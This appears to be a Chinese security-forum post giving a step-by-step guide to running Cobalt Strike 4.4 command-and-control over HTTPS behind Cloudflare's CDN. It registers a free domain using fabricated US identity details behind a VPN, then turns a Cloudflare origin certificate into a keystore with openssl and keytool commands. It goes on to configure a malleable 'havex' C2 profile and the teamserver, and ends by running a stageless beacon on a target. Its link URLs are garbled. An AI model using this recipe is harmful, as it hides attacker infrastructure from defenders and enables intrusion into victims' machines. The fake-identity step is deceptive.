-
-
[原创]cobalt strike cdn上线笔记
-
发表于: 2022-3-10 15:16
-
cobalt strike cdn上线笔记
免费域名注册:b01K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2X3M7X3g2W2L8X3!0E0i4K6u0W2j5$3!0E0i4K6u0r3P5X3S2Q4x3V1k6A6L8X3c8W2P5q4)9J5k6h3S2@1L8h3I4Q4x3@1k6D9j5h3&6Y4i4K6y4p5P5X3R3`.
CDN: 229K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6V1j5i4y4Z5i4K6u0W2j5$3I4G2N6h3c8X3L8r3q4J5k6g2)9J5k6h3y4G2L8g2)9J5c8R3`.`.
CS版本: cobalt strike4.4
一、 新域名注册
1、打开freenom进行新域名注册,先输入想要注册的域名,再检查其可用性。
2、点击完成,修改 Period为12个月,更长时间就需要付费。
3、进入账号注册页面,这里需要挂VPN,可以选择谷歌账号登录或者通过其他邮箱注册。
4、邮箱会收到freenom发来的确认邮件,点击邮件内容中的链接来到资料填写页面。
5、由于填写的资料需与当前网络信息一致,可以先查询当前VPN的IP归属地(做好是美国),再使用好维持(87cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3S2S2L8%4N6W2K9h3y4Z5K9g2)9J5k6h3y4G2L8g2)9J5c8R3`.`.
)生成美国人虚拟信息,州全称也需和IP归属的州名称一致。
6.根据虚拟信息填写对应资料,提交出现以下页面则注册成功。
二、 CDN注册
1.打开cloudflare(565K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6V1j5i4y4Z5i4K6u0W2j5$3I4G2N6h3c8X3L8r3q4J5k6g2)9J5k6h3y4G2L8g2)9J5z5g2!0q4z5q4!0n7c8W2)9&6b7W2!0q4z5q4!0m8x3g2)9^5b7#2!0q4z5q4!0n7y4q4!0m8y4W2!0q4y4g2)9^5c8W2!0n7y4#2!0q4y4W2!0n7x3#2!0m8z5q4!0q4y4g2)9^5y4W2)9^5b7#2!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4W2!0n7x3#2!0m8z5q4!0q4y4g2)9^5y4W2)9^5b7#2!0q4y4W2)9^5z5q4)9&6x3q4!0q4y4g2)9^5b7g2)9&6c8W2!0q4y4#2)9&6b7W2!0n7y4q4!0q4y4W2)9^5c8g2!0m8y4g2!0q4y4W2!0n7y4#2!0n7b7W2!0q4y4g2)9^5b7g2!0m8x3r3k6J5k6h3g2F1L8$3#2Q4c8e0k6Q4b7U0y4Q4b7e0S2Q4c8e0g2Q4z5o6k6Q4z5p5y4Q4c8e0N6Q4z5f1q4Q4z5o6c8Q4c8e0g2Q4z5o6g2Q4z5p5c8Q4c8e0S2Q4b7U0c8Q4b7U0W2Q4c8e0g2Q4z5f1k6Q4z5f1k6Q4c8e0g2Q4z5e0m8Q4z5p5c8Q4c8e0y4Q4z5o6m8Q4z5o6t1`.
2.选择免费计划。
3.添加DNS解析记录。
4.复制Cloudflare名称服务器地址。
5.登录freenom,打开My Domains->Manage Domain->Management Tools->Nameservers,选择Use custom nameservers (enter below),填写名称服务器。
6.自动配置全部选择关闭
7.概述显示“好消息!Cloudflare 正在保护您的站点”则配置成功。
三、cobalt strike https上线
1、打开Cloudflare,配置SSL/TLS加密模式为完全。
2、配置缓存,开启Always Online及开发模式。
3、打开SSL/TLS的源服务器创建源证书。
4、创建使用Cloudflare生成私钥和CSR,复制出源证书及私钥,保存为server.pem和server.key文件。
5、 使用以下命令重新生成store格式配置文件。
1、生成.p12格式文件
1 | openssl pkcs12 -export -in server.pem -inkey server.key -out spoofdomain.p12 -name 域名 -passout pass:密码 |
例子
1 | openssl pkcs12 -export -in server.pem -inkey server.key -out spoofdomain.p12 -name zh.xxxxx.tk -passout pass:pasa1234 |
2、生成.store格式文件
1 | keytool -importkeystore -deststorepass 密码 -destkeypass 密码 -destkeystore cs.store -srckeystore spoofdomain.p12 -srcstoretype PKCS12 -srcstorepass 密码 -alias 域名 |
例子
1 | keytool -importkeystore -deststorepass pasa1234 -destkeypass pasa1234 -destkeystore cs.store -srckeystore spoofdomain.p12 -srcstoretype PKCS12 -srcstorepass pasa1234 -alias zh.xxxxx.tk |
6、C2.profile配置
使用以下项目
ea2K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6J5M7$3#2#2k6r3N6W2i4K6u0r3e0h3q4D9L8r3g2S2j5X3I4W2i4K6u0V1b7K6u0Q4x3X3c8b7M7X3!0X3K9h3I4W2M7H3`.`.
在profile文件中添加以下配置。
1 2 3 4 | https-certificate { set keystore " cs.store "; set password "pasa1234";} |
7、 使用c2lint工具检测profile文件是否可用。不发生报错则可用。
1 | ./c2lint havex.profile |
8、 修改teamserver配置文件
1 | javax.net.ssl.keyStore=./cs.store路径 -Djavax.net.ssl.keyStorePassword=证书密码 |
例子
1 | javax.net.ssl.keyStore=./cs.store -Djavax.net.ssl.keyStorePassword=pasa1234 |
9、 启动cobalt strike
1 | ./teamserver 服务器IP 密码 ./ havex.profile文件路径 |
1 | ./teamserver 192.168.1.1 mimatest ./ havex.profile |
10、 配置https监听器
Cloudflare只支持监听以下端口:
Cloudflare支持的HTTP端口是:80,8080,8880,2052,2082,2086,2095
Cloudflare支持的HTTPs端口是:443,2053,2083,2087,2096,8443
如果VPS是国内云主机,且注册的免费域名没有备案,则不能使用80、8080、443、8443端口提供服务。以下使用的是2096端口。
11、 生成一个Stageless Payload,勾选启用https。
12、目标靶机执行,成功https上线。
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
